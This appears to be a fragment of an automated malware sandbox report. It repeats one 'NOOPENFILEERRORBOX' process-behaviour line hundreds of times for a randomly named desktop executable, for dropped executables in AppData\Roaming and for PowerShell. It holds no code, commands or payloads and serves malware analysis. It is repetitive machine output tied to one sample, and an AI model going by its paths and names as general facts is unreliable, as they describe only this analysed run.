                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
